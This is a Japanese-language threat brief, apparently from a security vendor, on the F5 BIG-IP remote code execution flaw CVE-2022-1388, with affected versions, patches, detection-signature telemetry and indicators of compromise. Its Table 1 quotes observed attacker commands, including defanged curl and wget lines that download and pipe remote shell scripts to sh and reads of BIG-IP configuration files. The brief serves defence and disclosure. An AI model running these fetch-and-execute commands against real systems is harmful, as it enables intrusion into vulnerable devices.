Protect Against Russia-Ukraine Cyber Activity

脅威に関する情報: CVE-2022-1388 BIG-IP製品のiControlRESTコンポーネントにおけるリモートコード実行の脆弱性

By

Category: Threat Brief, Vulnerability

Tags: ,

A conceptual image representing a vulnerability, such as CVE-2022-1388, discussed in this threat brief

This post is also available in: English (英語)

概要

F5は2022年5月4日、CVE番号CVE-2022-1388でトラッキングされるBIG-IP製品のiControlRESTコンポーネントにおけるリモートコード実行の脆弱性についてのセキュリティアドバイザリを公開しました。脅威アクターがこの脆弱性を悪用すると、パッチ未適用のシステムで認証を回避して任意のコードを実行可能です。この脆弱性はCVSSスコア9.8となっており緊急の対応が必要です。当該アドバイザリの公開以降、パッチ未適用のシステムを探して大量のスキャン活動が行われ、実際の悪用も始まっています。

パロアルトネットワークスはF5 BIG-IP 認証バイパス脆弱性(92570)に対する脅威防御シグネチャを公開しましたが、わずか10時間のあいだに、脆弱性スキャンとアクティブな悪用試みによるシグネチャのトリガーが2,552回発生しています。 

Unit 42はF5 BIG-IP製品をお使いの皆様に最新リリースへのアップグレードを推奨します。パロアルトネットワークスの次世代ファイアウォール製品(NGFW)で脅威防御を有効にしているお客様はシグネチャ92570により保護されています。

本稿で扱うCVE CVE-2022-1388

目次

脆弱なシステム
緩和策
実際に観測された事例
結論
追加リソース
IoC

脆弱なシステム

CVE-2022-1388の脆弱性があるF5製品はBIG-IPで、そのバージョンは以下の通りです。

  • 16.1.0 - 16.1.2
  • 15.1.0 - 15.1.5
  • 14.1.0 - 14.1.4
  • 13.1.0 - 13.1.4
  • 12.1.0 - 12.1.6
  • 11.6.1 - 11.6.5

この脆弱性はBIG-IPが使用するiControl RESTフレームワークに存在します。

緩和策

F5のBIG-IPをご利用のお客様はCVE-2022-1388を緩和するパッチが適用された以下のバージョンのいずれかにアップデートすることをお勧めします。

  • 17.0.0
  • 16.1.2.2
  • 15.1.5.1
  • 14.1.4.6
  • 13.1.5

パッチ適用済みバージョンのBIG-IPをインストールできるようになるまでのあいだ、脆弱なコンポーネントを信頼できるネットワークに制限する回避策でこの脆弱性を緩和する方法については、F5のセキュリティ アドバイザリの緩和策のセクションを参照してください。

実際に観測された事例

F5のセキュリティアドバイザリを受け、パロアルトネットワークスは5月9日に脅威防御シグネチャ「F5 BIG-IP Authentication Bypass Vulnerability (92570)」を公開しました。

このシグネチャは、5月10日の04:47から14:00(UTC)のあいだに2,552回トリガーされたことが観測されました。シグネチャをトリガーした2,151個のパケットを解析したところ、脆弱性スキャン活動とアクティブな悪用の試みの両方が観測されました。

表1は悪用が成功していれば実行されていたであろうコマンドを示したものです。これらはF5 BIG-IP Authentication Bypass Vulnerabilityシグネチャをトリガーしたパケットキャプチャを解析することで確認されたものです。

件数 コマンド
1954 id
125 cat /config/bigip.conf
24 cat /etc/profile
19 curl -o- -L hxxp://20.239.193[.]47/kele.sh| sh > /dev/null 2>&1  &
13 whoami
11 find /usr/local/www -name *.php | xargs grep eval
3 curl -fsLk hxxps://transfer[.]sh/dlxo3I/1.sh | sh
1 wget hxxp://20.187.86[.]47/dadda;chmod 777 *;./dadda
1 curl -o- -L hxxp://20.239.193[.]47/kele1|sh

表1 CVE-2022-1388を悪用する攻撃で観測されたコマンド

結論

パロアルトネットワークスのお客様は、以下の方法でこの脆弱性に対する保護を受けています。

  • 脅威防御セキュリティサブスクリプションをご契約いただいている次世代ファイアウォール (アプリケーションおよび脅威コンテンツのバージョン8567以降を実行) は、F5 BIG-IP Authentication Bypass Vulnerabilityシグネチャ(脅威ID92570)を使用して、この脆弱性に関連するセッションを自動的にブロックできます。

新たな情報と推奨事項が利用可能になりしだい、本概要は更新されます。

追加リソース

K23605346: BIG-IP iControl REST の脆弱性 CVE-2022-1388
EnemyBot、CVE-2022-1388のエクスプロイトを試行

IoC

ペイロードのSHA256

30f7e1998d162dfad69d6d8abb763ae4033bbd4a015d170b1ad3e20d39cd4e20
da647646cd36a3acb716b4266e9032f9c1caf555b7667e1dbe5bef89e7d2fdbb
b39d2a1202351d3be5d9906ec47ee05c305302124dddec5538dc7b9924c6b85d
ad6d44c70f83431bedf890967f2da0607c9b1f79591fb1b2697160f5b1c1a75c
1f93a6696f7bf1b2067cc503583deb4840404ebeeba89579bd303f57000baeb7
9a72aab2a3d1d6e66c185966597a52a8726ca25f5d9e2195af44f98d8b1847d5
53214f4d2d2dfd02b46f416cbdcb6f3a764820a50da4d59926f829b96cf82a6c

接続元IPv4アドレス

20.187.67[.]224
192.132.218[.]149
85.203.23[.]73
116.48.110[.]159

ホスティングをしているURL

hxxps://transfer[.]sh/dlxo3I/1.sh
hxxp://20.239.193[.]47/kele.sh
hxxp://20.239.193[.]47/kele1
hxxp://20.187.86[.]47/dadda

2022-05-17 09:30 JST 英語版更新日 2022-05-16 PDT の内容を反映